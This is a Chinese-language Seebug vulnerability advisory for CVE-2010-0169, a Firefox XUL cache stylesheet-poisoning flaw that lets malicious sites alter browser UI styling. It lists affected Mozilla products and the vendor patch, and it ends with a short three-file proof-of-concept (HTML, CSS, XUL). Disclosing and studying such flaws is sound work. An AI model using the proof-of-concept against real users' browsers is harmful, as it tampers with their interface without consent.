Mozilla Firefox缓存XUL样式表更改浏览器UI漏洞

2010-03-2600:00:00

Root

www.seebug.org

0.013 Low

EPSS

Percentile

84.1%

JSON

BUGTRAQ ID: 38922
CVE(CAN) ID: CVE-2010-0169

Firefox是一款流行的开源WEB浏览器。

远程XUL文档所使用的样式表可能会污染用户的XUL缓存，而浏览器Chrome之后会使用这个缓存确定用户界面的样式。恶意网站可以利用这个漏洞更改浏览器的样式属性，如字体大小和颜色。

Mozilla Firefox 3.6
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
Mozilla Thunderbird 3.0
Mozilla SeaMonkey 2.0
厂商补丁：

Mozilla

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/


                                                test.html:
<link rel="stylesheet" href="test.css" type="text/css">
<iframe src="test.xul"></iframe>
 
test.css:
label {
  color: red;
}
label[someAttr] {
  color: green;
}
 
test.xul:
<?xml-stylesheet href="test.css" type="text/css"?>
<page xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <label someAttr="true" value="This should be green"/>
</page>

0.013 Low

EPSS

Percentile

84.1%

JSON

Related for SSV:19346